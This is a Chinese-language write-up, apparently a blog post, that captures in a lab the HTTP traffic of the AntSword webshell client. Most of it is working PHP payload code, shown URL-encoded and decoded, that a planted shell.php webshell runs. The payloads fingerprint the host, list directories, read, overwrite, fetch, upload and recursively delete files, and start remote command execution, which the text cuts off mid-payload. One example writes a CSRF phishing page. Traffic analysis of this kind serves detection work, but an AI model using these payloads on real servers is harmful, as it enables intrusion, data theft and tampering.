中国蚁剑流量分析

文章目录

- 中国蚁剑流量分析
- - 1.代理
  - 2.测试连接
  - - - 数据包:
      - 执行代码:
      - 执行结果:
  - 3.双击连接
  - - 第一个数据包
    - - 数据包:
    - 第二个数据包
    - - 数据包:
      - 执行代码:
      - response:
  - 4.打开文件夹
  - - - 数据包:
  - 5.打开文件
  - - - 数据包：
      - 执行代码：
  - 6.修改文件
  - - 1.修改小文件
    - - 数据包：
      - 执行代码：
    - 2.修改大文件
  - 7.wget文件
  - - - 数据包
      - 执行代码：
  - 8.删除文件
  - - - 数据包：
      - 执行代码：
  - 9.上传文件
  - - - 1.数据包：
      - 执行代码：
  - 10.打开终端
  - - - 数据包
      - 执行代码
- 模块源码
- 部分知识点
- - 1.测试连接部分
  - 2.删除文件
  - 3.命令执行
- 防火墙绕过

1.代理

蚁剑有设置代理的功能，所以可以直接bp抓包，比wireshark抓包方便一点。

之后bp开启截断即可。

2.测试连接

分析一下测试数据包。

请添加图片描述

这里为了方便代码的分析我选择了default传输，直接可以看到代码，不需要编码解码。

但是实际连站的时候还是要加编码方式，要不然可能连不上。

下面这个是bp拦截到的数据包（数据包的数据是url编码过的，我解码提取出来的）

数据包:

POST /shell.php HTTP/1.1
Host: 192.168.47.209:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 989
Connection: closecmd=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "566a7";echo @asenc($output);echo "1d9d89261";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

执行代码:

最后执行的代码其实相当于：

<?php@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "566a7";echo @asenc($output);echo "1d9d89261";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
?>

执行结果:

566a7C:/Users/usesnick/phpstudy_pro/WWW C: Windows NT DESKTOP-423 10.0 build 19042 (Windows 10) AMD64 usesnick1d9d89261

可以看到测试连接的代码：

1.输出了当前脚本的目录
2.判断了操作系统
3.获取了当前用户信息
4.在输出首尾加上了随机的字符串

再仔细观察可以看到一个asenc函数，这个函数是对传输数据或者说执行结果进行编码/加密的函数，这里因为是default传输，所以编码函数没进行任何操作。

3.双击连接

测试连接成功后即可保存数据再双击连接一句话木马。这里我们分析这个步骤发送的数据包。

这里需要注意的是分析数据包的过程中要把缓存清空，否则有部分数据包会分析不到。

第一个数据包

数据包:

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 992
Connection: closecmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%222d837a3266%22%3Becho%20%40asenc(%24output)%3Becho%20%22b59b03b%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

摘出代码分析了一下发现跟测试连接的代码是一样的。

第二个数据包

第一个数据包放行后已经打开了基本的页面：

请添加图片描述

所以第二个数据包应该是获取了网站目录。分析一下：

数据包:

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1078
Connection: closecmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%227fe6ecff623%22%3Becho%20%40asenc(%24output)%3Becho%20%225613ae9b942%22%3B%7Dob_start()%3Btry%7B%24D%3Dbase64_decode(%24_POST%5B%22p81975e48c8157%22%5D)%3B%24F%3D%40opendir(%24D)%3Bif(%24F%3D%3DNULL)%7Becho(%22ERROR%3A%2F%2F%20Path%20Not%20Found%20Or%20No%20Permission!%22)%3B%7Delse%7B%24M%3DNULL%3B%24L%3DNULL%3Bwhile(%24N%3D%40readdir(%24F))%7B%24P%3D%24D.%24N%3B%24T%3D%40date(%22Y-m-d%20H%3Ai%3As%22%2C%40filemtime(%24P))%3B%40%24E%3Dsubstr(base_convert(%40fileperms(%24P)%2C10%2C8)%2C-4)%3B%24R%3D%22%09%22.%24T.%22%09%22.%40filesize(%24P).%22%09%22.%24E.%22%0A%22%3Bif(%40is_dir(%24P))%24M.%3D%24N.%22%2F%22.%24R%3Belse%20%24L.%3D%24N.%24R%3B%7Decho%20%24M.%24L%3B%40closedir(%24F)%3B%7D%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&p81975e48c8157=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy8%3D

执行代码:

<?php@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;
}
;
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "7fe6ecff623";echo @asenc($output);echo "5613ae9b942";
}
ob_start();
try{$D=base64_decode($_POST["p81975e48c8157"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="	".$T."	".@filesize($P)."	".$E."";if(@is_dir($P)$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}
;
}catch(Exception $e){echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
// &p81975e48c8157=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy8=
// p81975e48c8157=C:/Users/usesnick/phpstudy_pro/WWW//*	返回数据：
./ 2022-04-21 20:57:22 4096 0777
../ 2022-04-18 11:56:05 4096 0777
csrf/ 2021-08-10 18:01:21 0 0777
dvwa/ 2022-03-26 20:32:13 4096 0777
error/ 2021-07-17 22:46:05 0 0777
ftp/ 2021-08-18 22:04:00 0 0777
pikachu-master/ 2022-03-23 16:38:46 4096 0777
sqli-labs/ 2021-09-17 23:33:49 16384 0777
thinkphp_5.0.20/ 2022-03-01 18:29:30 4096 0777
antSword-1.php 2022-04-21 20:52:52 772 0666
antSword-2.php 2022-04-23 18:51:54 1154 0666
antSword-temp.php 2022-04-21 20:00:27 827 0666
antSword-test.php 2022-04-21 20:42:41 1191 0666
index.html 2019-09-03 14:30:48 2307 0666
info.php 2022-04-01 20:36:31 97 0666
log.txt 2021-09-17 22:47:15 0 0666
pikachu-master.zip 2022-04-19 15:53:14 17920 0666
shell.php 2022-03-23 10:24:07 29 0666
sqli-labs.zip 2022-03-19 12:27:53 3640593 0666
thinkphp_5.0.20.zip 2022-03-01 18:25:50 397100 0666
*/?>

所以这个数据包是得到了当前路径下的文件和文件夹，以及对应的修改时间、大小和权限。

这个路径是用一个参数传递的，所以修改参数可以得到对应路径的内容。

而且这里这个参数也是随机的，每次访问都不一样。

文件夹以/结尾，文件以后缀结尾。

response:

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2022 11:00:22 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8437fe6ecff623./	2022-04-21 20:57:22	4096	0777
../	2022-04-18 11:56:05	4096	0777
csrf/	2021-08-10 18:01:21	0	0777
dvwa/	2022-03-26 20:32:13	4096	0777
error/	2021-07-17 22:46:05	0	0777
ftp/	2021-08-18 22:04:00	0	0777
pikachu-master/	2022-03-23 16:38:46	4096	0777
sqli-labs/	2021-09-17 23:33:49	16384	0777
thinkphp_5.0.20/	2022-03-01 18:29:30	4096	0777
antSword-1.php	2022-04-21 20:52:52	772	0666
antSword-2.php	2022-04-23 18:56:29	2021	0666
antSword-temp.php	2022-04-21 20:00:27	827	0666
antSword-test.php	2022-04-21 20:42:41	1191	0666
index.html	2019-09-03 14:30:48	2307	0666
info.php	2022-04-01 20:36:31	97	0666
log.txt	2021-09-17 22:47:15	0	0666
pikachu-master.zip	2022-04-19 15:53:14	17920	0666
shell.php	2022-03-23 10:24:07	29	0666
sqli-labs.zip	2022-03-19 12:27:53	3640593	0666
thinkphp_5.0.20.zip	2022-03-01 18:25:50	397100	0666
5613ae9b942

返回数据包后界面：
请添加图片描述

4.打开文件夹

在目录列表或者文件列表选择一个文件夹打开，截取到

数据包:

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1080
Connection: closecmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2215b4c1c%22%3Becho%20%40asenc(%24output)%3Becho%20%22e2eac13%22%3B%7Dob_start()%3Btry%7B%24D%3Dbase64_decode(%24_POST%5B%22hc608291b15ec1%22%5D)%3B%24F%3D%40opendir(%24D)%3Bif(%24F%3D%3DNULL)%7Becho(%22ERROR%3A%2F%2F%20Path%20Not%20Found%20Or%20No%20Permission!%22)%3B%7Delse%7B%24M%3DNULL%3B%24L%3DNULL%3Bwhile(%24N%3D%40readdir(%24F))%7B%24P%3D%24D.%24N%3B%24T%3D%40date(%22Y-m-d%20H%3Ai%3As%22%2C%40filemtime(%24P))%3B%40%24E%3Dsubstr(base_convert(%40fileperms(%24P)%2C10%2C8)%2C-4)%3B%24R%3D%22%09%22.%24T.%22%09%22.%40filesize(%24P).%22%09%22.%24E.%22%0A%22%3Bif(%40is_dir(%24P))%24M.%3D%24N.%22%2F%22.%24R%3Belse%20%24L.%3D%24N.%24R%3B%7Decho%20%24M.%24L%3B%40closedir(%24F)%3B%7D%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&hc608291b15ec1=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLw%3D%3D

这里分析了一下代码发现跟连接过程的第二个数据包基本一致，至少改变了参数名称和参数值。

hc608291b15ec1=base64_encode("C:/Users/usesnick/phpstudy_pro/WWW/csrf/")

大概蚁剑打开文件夹的函数基本就是这个。

5.打开文件

在文件列表选择一个文件打开，截取数据包分析。

数据包：

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 696
Connection: closecmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2234f646%22%3Becho%20%40asenc(%24output)%3Becho%20%220d0d3453d%22%3B%7Dob_start()%3Btry%7B%24F%3Dbase64_decode(%24_POST%5B%22hc608291b15ec1%22%5D)%3B%24P%3D%40fopen(%24F%2C%22r%22)%3Becho(%40fread(%24P%2Cfilesize(%24F)%3Ffilesize(%24F)%3A4096))%3B%40fclose(%24P)%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&hc608291b15ec1=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLzE5Mi4xNjguNDcuMTQxL2NzcmYubWVkaXVtLmh0bWw%3D

执行代码：

<<?php$hc608291b15ec1="QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLzE5Mi4xNjguNDcuMTQxL2NzcmYubWVkaXVtLmh0bWw=";
//$hc608291b15ec1="C:/Users/usesnick/phpstudy_pro/WWW/csrf/192.168.47.141/csrf.medium.html"@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;
}
;
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "34f646";echo @asenc($output);echo "0d0d3453d";
}
ob_start();
try{$F=base64_decode($hc608291b15ec1);$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);
;
}catch(Exception $e){echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();?>

可以看到是fopen函数打开，fread函数读取文件内容。

6.修改文件

蚁剑打开某个文件的界面后其实是在编辑这个文件。

如果我们不对文件做修改，那直接退出即可。但是我们可以直接修改文件并且点击保存来保存修改。

1.修改小文件

这里截取保存文件的数据包分析：

数据包：

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1226
Connection: closeb2e09c4cfdd442=PGh0bWw%2BDQoNCgk8aGVhZD4NCgkJPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWwiOyBjaGFyc2VyPSJVVEYtOCIgLz4NCgkJPHRpdGxlPnlvdSBoYXZlIGdvdCB0aGUgd2lubmluZyBudW1iZXIgaW4gYSBib25kPC90aXRsZT4NCgk8L2hlYWQ%2BDQoNCgk8Ym9keT4NCgkJPGEgaHJlZj0iaHR0cDovLzE5Mi4xNjguNDcuMTQxL0RWV0EtbWFzdGVyL3Z1bG5lcmFiaWxpdGllcy9jc3JmLz9wYXNzd29yZF9uZXc9MTIzNDU2JnBhc3N3b3JkX2NvbmY9MTIzNDU2JkNoYW5nZT1DaGFuZ2UiPmNsaWNrIGhlcmUgdG8gZ2V0IGludG8gdGhlIHdlYnNpdGUgd2hlcmUgeW91IGNhbiBjYXNoIHlvdXIgcHJpemU8L2E%2BDQoJPC9ib2R5Pg0KDQo8L2h0bWw%2B&cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2272860995809%22%3Becho%20%40asenc(%24output)%3Becho%20%223500346f15%22%3B%7Dob_start()%3Btry%7Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%22hc608291b15ec1%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%22b2e09c4cfdd442%22%5D))%3F%221%22%3A%220%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&hc608291b15ec1=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLzE5Mi4xNjguNDcuMTQxL2NzcmYubWVkaXVtLmh0bWw%3D

执行代码：

<?php$b2e09c4cfdd442="PGh0bWw+DQoNCgk8aGVhZD4NCgkJPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeX".
"lIiBjb250ZW50PSJ0ZXh0L2h0bWwiOyBjaGFyc2VyPSJVVEYtOCIgLz4NCgkJPHRpdGxlPnlvdSBoYXZlIGdvdC".
"B0aGUgd2lubmluZyBudW1iZXIgaW4gYSBib25kPC90aXRsZT4NCgk8L2hlYWQ+DQoNCgk8Ym9keT4NCgkJP".
"GEgaHJlZj0iaHR0cDovLzE5Mi4xNjguNDcuMTQxL0RWV0EtbWFzdGVyL3Z1bG5lcmFiaWxpdGllcy9jc3JmLz9".
"wYXNzd29yZF9uZXc9MTIzNDU2JnBhc3N3b3JkX2NvbmY9MTIzNDU2JkNoYW5nZT1DaGFuZ2UiPmNsaWNrI".
"GhlcmUgdG8gZ2V0IGludG8gdGhlIHdlYnNpdGUgd2hlcmUgeW91IGNhbiBjYXNoIHlvdXIgcHJpemU8L2E+D". 
"QoJPC9ib2R5Pg0KDQo8L2h0bWw+";$hc608291b15ec1="QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLzE5Mi4xNjguNDcuMTQ".
"xL2NzcmYubWVkaXVtLmh0bWw=";@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;
}
;
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "72860995809";echo @asenc($output);echo "3500346f15";
}
ob_start();
try{echo @fwrite(fopen(base64_decode($_POST["hc608291b15ec1"]),"w"),base64_decode($_POST["b2e09c4cfdd442"]))?"1":"0";
;
}catch(Exception $e){echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();?>

可以看到一个参数传入文件名，一个参数传入base64编码过的文件内容。那这里就有一个问题，修改大文件这么修改的话就会有时间和数据长度的问题。

而且这个方法还会返回一个数字来表示修改成功与否，但是会因为跟返回值头和返回值尾拼接所以不太好发现。

echo "72860995809";
echo @asenc($output);
echo "3500346f15";
// 72860995809 1 3500346f15

2.修改大文件

7.wget文件

蚁剑可以wget从网站下载文件，也可以本地上传文件。这里截取wget的数据包分析一下：

数据包

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 963
Connection: closeb2e09c4cfdd442=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9hbnRTd29yZEFuYWx5c2lzL2FudFN3b3JkLWZpbGVTYXZlLnBocA%3D%3D&cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%222451a1%22%3Becho%20%40asenc(%24output)%3Becho%20%22eff126efd%22%3B%7Dob_start()%3Btry%7B%24fR%3Dbase64_decode(%24_POST%5B%22hc608291b15ec1%22%5D)%3B%24fL%3Dbase64_decode(%24_POST%5B%22b2e09c4cfdd442%22%5D)%3B%24F%3D%40fopen(%24fR%2Cchr(114))%3B%24L%3D%40fopen(%24fL%2Cchr(119))%3Bif(%24F%20%26%26%20%24L)%7Bwhile(!feof(%24F))%40fwrite(%24L%2C%40fgetc(%24F))%3B%40fclose(%24F)%3B%40fclose(%24L)%3Becho(%221%22)%3B%7Delse%7Becho(%220%22)%3B%7D%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&hc608291b15ec1=aHR0cDovLzE5Mi4xNjguNDcuMjEyL2FudFN3b3JkLWZpbGVTYXZlLnBocA%3D%3D

执行代码：

<?php
$b2e09c4cfdd442="QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9hbnRTd29yZEFuYWx5c2lzL2FudFN3b3JkLWZpbGVTYXZlLnBocA==";
// $b2e09c4cfdd442 = "C:/Users/usesnick/phpstudy_pro/WWW/antSwordAnalysis/antSword-fileSave.php"
$hc608291b15ec1="aHR0cDovLzE5Mi4xNjguNDcuMjEyL2FudFN3b3JkLWZpbGVTYXZlLnBocA==";
// $hc608291b15ec1="http://192.168.47.212/antSword-fileSave.php"@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;
}
;
function asoutput(){$output=ob_get_contents();
ob_end_clean();
echo "2451a1";
echo @asenc($output);
echo "eff126efd";
}
ob_start();
try{$fR=base64_decode($hc608291b15ec1);	// file Refer$fL=base64_decode($b2e09c4cfdd442);$F=@fopen($fR,chr(114));		#  r$L=@fopen($fL,chr(119));		#  wif($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");}
;
;
}catch(Exception $e){echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();?>

fopen函数读取和写入。这里有一个地方得注意就是不能在不存在的文件夹下写文件，蚁剑的代码不会帮助创建文件夹。

8.删除文件

数据包：

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1143
Connection: closecmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%222b9b23073%22%3Becho%20%40asenc(%24output)%3Becho%20%224f5f85f%22%3B%7Dob_start()%3Btry%7Bfunction%20df(%24p)%7B%24m%3D%40dir(%24p)%3Bwhile(%40%24f%3D%24m-%3Eread())%7B%24pf%3D%24p.%22%2F%22.%24f%3Bif((is_dir(%24pf))%26%26(%24f!%3D%22.%22)%26%26(%24f!%3D%22..%22))%7B%40chmod(%24pf%2C0777)%3Bdf(%24pf)%3B%7Dif(is_file(%24pf))%7B%40chmod(%24pf%2C0777)%3B%40unlink(%24pf)%3B%7D%7D%24m-%3Eclose()%3B%40chmod(%24p%2C0777)%3Breturn%20%40rmdir(%24p)%3B%7D%24F%3Dbase64_decode(get_magic_quotes_gpc()%3Fstripslashes(%24_POST%5B%22hc608291b15ec1%22%5D)%3A%24_POST%5B%22hc608291b15ec1%22%5D)%3Bif(is_dir(%24F))echo(df(%24F))%3Belse%7Becho(file_exists(%24F)%3F%40unlink(%24F)%3F%221%22%3A%220%22%3A%220%22)%3B%7D%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&hc608291b15ec1=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLzE5Mi4xNjguNDcuMTQxL2NzcmYubWVkaXVtLmh0bWwuaHRtbQ%3D%3D

执行代码：

<?php
$hc608291b15ec1="QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmLzE5Mi4xNjguNDcuMTQxL2NzcmYubWVkaXVtLmh0bWwuaHRtbQ==";
# $hc608291b15ec1="C:/Users/usesnick/phpstudy_pro/WWW/csrf/192.168.47.141/csrf.medium.html.htmm";@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;
}
;
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "2b9b23073";echo @asenc($output);echo "4f5f85f";
}
ob_start();
try{function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}	$F=base64_decode(get_magic_quotes_gpc()?stripslashes($hc608291b15ec1):$hc608291b15ec1);if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");};
}
catch(Exception $e){echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
?>

如果传入文件，则删除文件，如果传入目录则删除目录下所有文件。

9.上传文件

1.数据包：

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 906
Connection: closeb2e09c4cfdd442=31323334&cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%223c17376ef5%22%3Becho%20%40asenc(%24output)%3Becho%20%221eb517251cf%22%3B%7Dob_start()%3Btry%7B%24f%3Dbase64_decode(%24_POST%5B%22hc608291b15ec1%22%5D)%3B%24c%3D%24_POST%5B%22b2e09c4cfdd442%22%5D%3B%24c%3Dstr_replace(%22%0D%22%2C%22%22%2C%24c)%3B%24c%3Dstr_replace(%22%0A%22%2C%22%22%2C%24c)%3B%24buf%3D%22%22%3Bfor(%24i%3D0%3B%24i%3Cstrlen(%24c)%3B%24i%2B%3D2)%24buf.%3Durldecode(%22%25%22.substr(%24c%2C%24i%2C2))%3Becho(%40fwrite(fopen(%24f%2C%22a%22)%2C%24buf)%3F%221%22%3A%220%22)%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&hc608291b15ec1=QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmL2EudHh0

执行代码：

<?php
b2e09c4cfdd442="3132333435";		#hexFileContext
hc608291b15ec1="QzovVXNlcnMvdXNlc25pY2svcGhwc3R1ZHlfcHJvL1dXVy9jc3JmL2V4ZS5lbGY=";		# base64 fileName@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "cbb7a5084147";echo @asenc($output);echo "f7e92c6f37e";
}
ob_start();
try{$f=base64_decode($hc608291b15ec1);$c=$b2e09c4cfdd442;$c=str_replace("","",$c);$c=str_replace("","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");;
}catch(Exception $e){echo "ERROR://".$e->getMessage();
};
asoutput();
die();?>

将十六进制文件解码后写入。

10.打开终端

蚁剑在文件列表右键可以在此处打开终端，点击后蚁剑开启一个shell窗口，bp抓取到如下数据包：

数据包

POST /shell.php HTTP/1.1
Host: 192.168.47.212:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4094
Connection: closecmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22f3ae7401e%22%3Becho%20%40asenc(%24output)%3Becho%20%22a93d05c%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%22p0575f64ef2e5d%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%22td4ec8ab550155%22%5D)%3B%24envstr%3D%40base64_decode(%24_POST%5B%22y83f85ce29f1ae%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bfo